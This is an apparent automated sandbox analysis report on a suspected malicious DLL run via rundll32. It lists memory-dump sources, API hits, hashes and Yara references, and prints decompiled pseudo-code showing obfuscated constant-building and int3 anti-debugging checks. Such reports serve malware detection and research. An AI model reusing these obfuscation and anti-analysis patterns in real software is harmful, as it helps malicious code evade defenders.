                                                                                                        0x02fc1a71
                                                                                                        0x02fc1a8c
                                                                                                        0x02fc1a8c
                                                                                                        0x02fc1b76
                                                                                                        0x02fc1b79
                                                                                                        0x02fc1aa5
                                                                                                        0x02fc1aa8
                                                                                                        0x02fc1b84
                                                                                                        0x02fc1b84
                                                                                                        0x02fc1b9b
                                                                                                        0x02fc1bc3
                                                                                                        0x02fc1bcf
                                                                                                        0x02fc1bd2
                                                                                                        0x02fc1bd6
                                                                                                        0x02fc1bda
                                                                                                        0x02fc1be1
                                                                                                        0x02fc1be7
                                                                                                        0x02fc1be9
                                                                                                        0x02fc1bf2
                                                                                                        0x02fc1c03
                                                                                                        0x02fc1c09
                                                                                                        0x02fc1c0c
                                                                                                        0x02fc1c0f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x02fc1c11
                                                                                                        0x02fc1b84
                                                                                                        0x02fc1c31
                                                                                                        0x02fc1c3f
                                                                                                        0x02fc1c47
                                                                                                        0x02fc1c4a
                                                                                                        0x02fc1c4c
                                                                                                        0x02fc1c52
                                                                                                        0x02fc1c5e
                                                                                                        0x02fc1c64
                                                                                                        0x02fc1c67
                                                                                                        0x02fc1c6a
                                                                                                        0x02fc1ae4
                                                                                                        0x02fc1ae4
                                                                                                        0x02fc1af7
                                                                                                        0x02fc1afd
                                                                                                        0x02fc1b03
                                                                                                        0x02fc1b09
                                                                                                        0x02fc1b0f
                                                                                                        0x02fc1b15
                                                                                                        0x02fc1b1b
                                                                                                        0x02fc1b1e
                                                                                                        0x02fc1b21
                                                                                                        0x02fc1b29
                                                                                                        0x02fc1b31
                                                                                                        0x02fc1b37
                                                                                                        0x02fc1b3d
                                                                                                        0x02fc1b43
                                                                                                        0x02fc1b49
                                                                                                        0x02fc1b57
                                                                                                        0x02fc1c24
                                                                                                        0x02fc1c2a
                                                                                                        0x02fc1c2a
                                                                                                        0x02fc1ac9

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.590028939.0000000002FC0000.00000040.00000001.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: \
                                                                                                        • API String ID: 544645111-2967466578
                                                                                                        • Opcode ID: 19839e07156da2799e973254c19a9797c6ea370fa577f9afeb67fc6be63b4b9b
                                                                                                        • Instruction ID: 794a589e34a8645315f4057cab7dac126cc7b28ee12dcedd079de39547e5922a
                                                                                                        • Opcode Fuzzy Hash: 19839e07156da2799e973254c19a9797c6ea370fa577f9afeb67fc6be63b4b9b
                                                                                                        • Instruction Fuzzy Hash: 77B1BDB5E002198FCB14CFA9C980A9DFBF1FF88310F65856AD958AB352D330A951CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02FC1C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.590028939.0000000002FC0000.00000040.00000001.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction ID: 8253e0e71ec172fe237a336cc589da04d41451f4e1d565b430bc5d03674bc20a
                                                                                                        • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction Fuzzy Hash: A441D2B5E0421A8FDB04CFA8C5906AEBBF1FF48354F24852DE948AB341D375A851CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Analysis Process: rundll32.exe PID: 5648 Parent PID: 5632 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 10001494, Relevance: 1.9, Strings: 1, Instructions: 613COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 32%
                                                                                                        			E10001494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				char _v56;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				void* __ebp;
				void* _t282;
				void* _t286;
				intOrPtr* _t310;
				signed char _t312;
				intOrPtr* _t319;
				intOrPtr* _t435;
				intOrPtr* _t481;
				void* _t482;

				_t482 = __eflags;
				_t481 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E1000F5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v76, E1000F4F0( &_v76) + 0x10);
				E1000F4E0( &_v80, E1000F4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t326 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v84, E1000F4F0(_t326) + 0x10);
				E1000F4E0( &_v88, E1000F4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t330 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v92, E1000F4F0(_t330) + 0x10);
				E1000F4E0( &_v96, E1000F4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t334 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v100, E1000F4F0(_t334) + 0x10);
				E1000F4E0( &_v104, E1000F4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t338 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v108, E1000F4F0(_t338) + 0x10);
				E1000F4E0( &_v112, E1000F4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t342 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v116, E1000F4F0(_t342) + 0x10);
				E1000F4E0( &_v120, E1000F4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t346 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v124, E1000F4F0(_t346) + 0x10);
				E1000F4E0( &_v128, E1000F4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t350 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v132, E1000F4F0(_t350) + 0x10);
				E1000F4E0( &_v136, E1000F4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t354 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v140, E1000F4F0(_t354) + 0x10);
				E1000F4E0( &_v144, E1000F4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t358 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v148, E1000F4F0(_t358) + 0x10);
				E1000F4E0( &_v152, E1000F4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t362 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v156, E1000F4F0(_t362) + 0x10);
				E1000F4E0( &_v160, E1000F4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t366 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v164, E1000F4F0(_t366) + 0x10);
				E1000F4E0( &_v168, E1000F4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t370 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v172, E1000F4F0(_t370) + 0x10);
				E1000F4E0( &_v176, E1000F4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t374 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v180, E1000F4F0(_t374) + 0x10);
				E1000F4E0( &_v184, E1000F4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t378 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v188, E1000F4F0(_t378) + 0x10);
				E1000F4E0( &_v192, E1000F4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t382 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v196, E1000F4F0(_t382) + 0x10);
				E1000F4E0( &_v200, E1000F4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t386 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v204, E1000F4F0(_t386) + 0x10);
				E1000F4E0( &_v208, E1000F4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t435 = _t481;
				 *_t435 =  *_t435 + 1;
				E100141D8(0xfe338407, _t435);
				E1000F4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E1000F4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E1000F4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E1000F4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E1000F4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E1000F4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E1000F4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E1000F4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E1000F4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E1000F4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E1000F4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E1000F4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E1000F4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E1000F4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E1000F4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E1000F4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E1000F4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E10001D2C(_v248, _t435, _t482, _t282, _t282);
				_t319 = _t435;
				E1000B2C0( &_v248, _v256, _t482, _v252, _t319);
				E1000F864( &_v296, _t482);
				_v300 = 0;
				_t411 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0"); // executed
				_t286 = E1000F4F0(_t411); // executed
				E1000F84C( &_v296, _t286 + 0x10);
				E1000F4E0( &_v300, E1000F4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t415 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v304, E1000F4F0(_t415) + 0x10);
				E1000F4E0( &_v308, E1000F4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t419 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v312, E1000F4F0(_t419) + 0x10);
				E1000F4E0( &_v316, E1000F4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t423 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v320, E1000F4F0(_t423) + 0x10);
				E1000F4E0( &_v324, E1000F4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t481 =  *_t481 + 1;
				_t310 = _t481;
				_push(_t310);
				_push(_t319);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E1000BA40(_t154,  *_t481);
				_t312 = E1000F4E0( &_v340, 0);
				 *(_t312 & 0x000000d8) =  *(_t312 & 0x000000d8) + _t313;
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E1000F4E0( &_v84, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E1000F4E0( &_v88, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E1000F4E0( &_v92, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E1000F678( &_v56);
				return E1000F678( &_v96);
			}















































































                                                                                                        0x10001494
                                                                                                        0x10001498
                                                                                                        0x1000149d
                                                                                                        0x100014a3
                                                                                                        0x100014ab
                                                                                                        0x100014b0
                                                                                                        0x100014bc
                                                                                                        0x100014c0
                                                                                                        0x100014d2
                                                                                                        0x100014e8
                                                                                                        0x100014f3
                                                                                                        0x100014f4
                                                                                                        0x100014f5
                                                                                                        0x100014f6
                                                                                                        0x100014f7
                                                                                                        0x100014fa
                                                                                                        0x100014fe
                                                                                                        0x10001502
                                                                                                        0x10001509
                                                                                                        0x1000151b
                                                                                                        0x10001531
                                                                                                        0x1000153c
                                                                                                        0x1000153d
                                                                                                        0x1000153e
                                                                                                        0x1000153f
                                                                                                        0x10001540
                                                                                                        0x10001543
                                                                                                        0x10001547
                                                                                                        0x1000154b
                                                                                                        0x10001552
                                                                                                        0x10001564
                                                                                                        0x1000157a
                                                                                                        0x10001585
                                                                                                        0x10001586
                                                                                                        0x10001587
                                                                                                        0x10001588
                                                                                                        0x10001589
                                                                                                        0x1000158c
                                                                                                        0x10001590
                                                                                                        0x10001594
                                                                                                        0x1000159b
                                                                                                        0x100015ad
                                                                                                        0x100015c3
                                                                                                        0x100015ce
                                                                                                        0x100015cf
                                                                                                        0x100015d0
                                                                                                        0x100015d1
                                                                                                        0x100015d2
                                                                                                        0x100015d5
                                                                                                        0x100015d9
                                                                                                        0x100015dd
                                                                                                        0x100015e4
                                                                                                        0x100015f6
                                                                                                        0x1000160c
                                                                                                        0x10001617
                                                                                                        0x10001618
                                                                                                        0x10001619
                                                                                                        0x1000161a
                                                                                                        0x1000161b
                                                                                                        0x1000161e
                                                                                                        0x10001622
                                                                                                        0x10001626
                                                                                                        0x1000162d
                                                                                                        0x1000163f
                                                                                                        0x10001655
                                                                                                        0x10001660
                                                                                                        0x10001661
                                                                                                        0x10001662
                                                                                                        0x10001663
                                                                                                        0x10001664
                                                                                                        0x10001667
                                                                                                        0x1000166b
                                                                                                        0x1000166f
                                                                                                        0x10001676
                                                                                                        0x10001688
                                                                                                        0x1000169e
                                                                                                        0x100016a9
                                                                                                        0x100016aa
                                                                                                        0x100016ab
                                                                                                        0x100016ac
                                                                                                        0x100016ad
                                                                                                        0x100016b0
                                                                                                        0x100016b4
                                                                                                        0x100016b8
                                                                                                        0x100016bf
                                                                                                        0x100016d1
                                                                                                        0x100016e7
                                                                                                        0x100016f2
                                                                                                        0x100016f3
                                                                                                        0x100016f4
                                                                                                        0x100016f5
                                                                                                        0x100016f6
                                                                                                        0x100016f9
                                                                                                        0x100016fd
                                                                                                        0x10001701
                                                                                                        0x10001708
                                                                                                        0x1000171a
                                                                                                        0x10001730
                                                                                                        0x1000173b
                                                                                                        0x1000173c
                                                                                                        0x1000173d
                                                                                                        0x1000173e
                                                                                                        0x1000173f
                                                                                                        0x10001742
                                                                                                        0x10001746
                                                                                                        0x1000174a
                                                                                                        0x10001751
                                                                                                        0x10001763
                                                                                                        0x10001779
                                                                                                        0x10001784
                                                                                                        0x10001785
                                                                                                        0x10001786
                                                                                                        0x10001787
                                                                                                        0x10001788
                                                                                                        0x1000178b
                                                                                                        0x1000178f
                                                                                                        0x10001793
                                                                                                        0x1000179a
                                                                                                        0x100017ac
                                                                                                        0x100017c2
                                                                                                        0x100017cd
                                                                                                        0x100017ce
                                                                                                        0x100017cf
                                                                                                        0x100017d0
                                                                                                        0x100017d1
                                                                                                        0x100017d4
                                                                                                        0x100017d8
                                                                                                        0x100017dc
                                                                                                        0x100017e3
                                                                                                        0x100017f5
                                                                                                        0x1000180b
                                                                                                        0x10001816
                                                                                                        0x10001817
                                                                                                        0x10001818
                                                                                                        0x10001819
                                                                                                        0x1000181a
                                                                                                        0x1000181d
                                                                                                        0x10001821
                                                                                                        0x10001825
                                                                                                        0x1000182c
                                                                                                        0x1000183e
                                                                                                        0x10001854
                                                                                                        0x1000185f
                                                                                                        0x10001860
                                                                                                        0x10001861
                                                                                                        0x10001862
                                                                                                        0x10001863
                                                                                                        0x10001866
                                                                                                        0x1000186a
                                                                                                        0x1000186e
                                                                                                        0x10001875
                                                                                                        0x10001887
                                                                                                        0x1000189d
                                                                                                        0x100018a8
                                                                                                        0x100018a9
                                                                                                        0x100018aa
                                                                                                        0x100018ab
                                                                                                        0x100018ac
                                                                                                        0x100018af
                                                                                                        0x100018b3
                                                                                                        0x100018b7
                                                                                                        0x100018be
                                                                                                        0x100018d0
                                                                                                        0x100018e6
                                                                                                        0x100018f1
                                                                                                        0x100018f2
                                                                                                        0x100018f3
                                                                                                        0x100018f4
                                                                                                        0x100018f5
                                                                                                        0x100018f8
                                                                                                        0x100018fc
                                                                                                        0x10001900
                                                                                                        0x10001907
                                                                                                        0x10001919
                                                                                                        0x1000192f
                                                                                                        0x1000193a
                                                                                                        0x1000193b
                                                                                                        0x1000193c
                                                                                                        0x1000193d
                                                                                                        0x1000193e
                                                                                                        0x10001941
                                                                                                        0x10001945
                                                                                                        0x10001949
                                                                                                        0x10001950
                                                                                                        0x10001962
                                                                                                        0x10001978
                                                                                                        0x10001983
                                                                                                        0x10001984
                                                                                                        0x10001985
                                                                                                        0x10001986
                                                                                                        0x1000198c
                                                                                                        0x1000198f
                                                                                                        0x10001991
                                                                                                        0x1000199c
                                                                                                        0x100019a3
                                                                                                        0x100019ac
                                                                                                        0x100019b4
                                                                                                        0x100019bb
                                                                                                        0x100019c4
                                                                                                        0x100019cc
                                                                                                        0x100019d3
                                                                                                        0x100019dc
                                                                                                        0x100019e4
                                                                                                        0x100019eb
                                                                                                        0x100019f4
                                                                                                        0x100019fc
                                                                                                        0x10001a03
                                                                                                        0x10001a0c
                                                                                                        0x10001a14
                                                                                                        0x10001a1b
                                                                                                        0x10001a24
                                                                                                        0x10001a2c
                                                                                                        0x10001a36
                                                                                                        0x10001a3f
                                                                                                        0x10001a47
                                                                                                        0x10001a51
                                                                                                        0x10001a5a
                                                                                                        0x10001a62
                                                                                                        0x10001a6c
                                                                                                        0x10001a75
                                                                                                        0x10001a7d
                                                                                                        0x10001a87
                                                                                                        0x10001a90
                                                                                                        0x10001a98
                                                                                                        0x10001aa2
                                                                                                        0x10001aab
                                                                                                        0x10001ab3
                                                                                                        0x10001abd
                                                                                                        0x10001ac6
                                                                                                        0x10001ace
                                                                                                        0x10001ad8
                                                                                                        0x10001ae1
                                                                                                        0x10001ae9
                                                                                                        0x10001af3
                                                                                                        0x10001afc
                                                                                                        0x10001b04
                                                                                                        0x10001b0e
                                                                                                        0x10001b17
                                                                                                        0x10001b1f
                                                                                                        0x10001b26
                                                                                                        0x10001b2f
                                                                                                        0x10001b37
                                                                                                        0x10001b3e
                                                                                                        0x10001b43
                                                                                                        0x10001b51
                                                                                                        0x10001b55
                                                                                                        0x10001b64
                                                                                                        0x10001b6d
                                                                                                        0x10001b72
                                                                                                        0x10001b79
                                                                                                        0x10001b7d
                                                                                                        0x10001b81
                                                                                                        0x10001b88
                                                                                                        0x10001b8d
                                                                                                        0x10001b9a
                                                                                                        0x10001bb0
                                                                                                        0x10001bbb
                                                                                                        0x10001bbc
                                                                                                        0x10001bbd
                                                                                                        0x10001bbe
                                                                                                        0x10001bbf
                                                                                                        0x10001bc2
                                                                                                        0x10001bc6
                                                                                                        0x10001bca
                                                                                                        0x10001bd1
                                                                                                        0x10001be3
                                                                                                        0x10001bf9
                                                                                                        0x10001c04
                                                                                                        0x10001c05
                                                                                                        0x10001c06
                                                                                                        0x10001c07
                                                                                                        0x10001c08
                                                                                                        0x10001c0b
                                                                                                        0x10001c0f
                                                                                                        0x10001c13
                                                                                                        0x10001c1a
                                                                                                        0x10001c2c
                                                                                                        0x10001c42
                                                                                                        0x10001c4d
                                                                                                        0x10001c4e
                                                                                                        0x10001c4f
                                                                                                        0x10001c50
                                                                                                        0x10001c51
                                                                                                        0x10001c54
                                                                                                        0x10001c58
                                                                                                        0x10001c5c
                                                                                                        0x10001c63
                                                                                                        0x10001c75
                                                                                                        0x10001c8b
                                                                                                        0x10001c96
                                                                                                        0x10001c97
                                                                                                        0x10001c98
                                                                                                        0x10001c99
                                                                                                        0x10001c9a
                                                                                                        0x10001c9d
                                                                                                        0x10001ca0
                                                                                                        0x10001ca1
                                                                                                        0x10001ca2
                                                                                                        0x10001ca9
                                                                                                        0x10001cac
                                                                                                        0x10001cb7
                                                                                                        0x10001cba
                                                                                                        0x10001cbe
                                                                                                        0x10001cc7
                                                                                                        0x10001ccf
                                                                                                        0x10001cd6
                                                                                                        0x10001cdf
                                                                                                        0x10001ce7
                                                                                                        0x10001cee
                                                                                                        0x10001cf7
                                                                                                        0x10001cff
                                                                                                        0x10001d04
                                                                                                        0x10001d0d
                                                                                                        0x10001d15
                                                                                                        0x10001d2a

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: g
                                                                                                        • API String ID: 0-171373902
                                                                                                        • Opcode ID: d677e2debecd4237b772c6d1c6e96de3a9b3429ba9283d82259752ede6aabf95
                                                                                                        • Instruction ID: b442155eacf7675d39859fb34eebdae8123254ffe159dd47b7877bbbb04c0330
                                                                                                        • Opcode Fuzzy Hash: d677e2debecd4237b772c6d1c6e96de3a9b3429ba9283d82259752ede6aabf95
                                                                                                        • Instruction Fuzzy Hash: 1032C6764047059AD705DF24C852AFFB3A0EFA2388F10871DB8896A1A7FF71F985D681
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 10010754, Relevance: 1.9, Strings: 1, Instructions: 650COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E10010754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				char _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t201;
				char _t204;
				void* _t213;
				void* _t214;
				char _t216;
				char _t217;
				char _t224;
				char _t239;
				char _t242;
				char _t245;
				char _t248;
				char _t251;
				char _t255;
				char _t260;
				void* _t269;
				void* _t270;
				char _t272;
				char _t273;
				void* _t277;
				char _t278;
				char _t279;
				char _t283;
				intOrPtr* _t292;
				signed char _t295;
				signed char _t296;
				intOrPtr* _t321;
				intOrPtr* _t326;
				intOrPtr* _t348;
				intOrPtr* _t364;
				char _t365;
				intOrPtr* _t370;
				intOrPtr* _t373;
				intOrPtr* _t378;
				char _t383;
				char _t384;
				char _t385;
				char _t386;
				char _t387;
				char _t388;
				char _t394;
				char _t396;
				char _t402;
				char _t404;
				intOrPtr* _t405;
				signed int _t407;
				intOrPtr* _t410;
				intOrPtr* _t412;
				signed int _t414;
				void* _t415;
				void* _t416;
				char _t421;
				intOrPtr* _t424;
				void* _t426;
				intOrPtr* _t428;
				void* _t429;
				void* _t430;

				_t415 = __ecx;
				_t155 =  *0x1001d1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E100135F4(0x30);
					 *0x1001d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t415 != 0) {
					_t416 = _t429 + 0x48;
					E10013670(_t416, 0, 0x11c);
					_t430 = _t429 + 0xc;
					 *((intOrPtr*)(_t430 + 0x48)) = 0x11c;
					if(E10013044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t416);
						asm("int3");
						asm("int3");
					}
					_t405 =  *0x1001d1f8;
					_t159 = _t430 + 0x4c;
					_t295 =  *_t159;
					 *(_t405 + 8) = _t295;
					_t296 = _t159[4];
					 *(_t405 + 9) = _t296;
					 *((char*)(_t405 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t405 + 4)) =  *((intOrPtr*)(_t430 + 0x54));
					 *((char*)(_t405 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
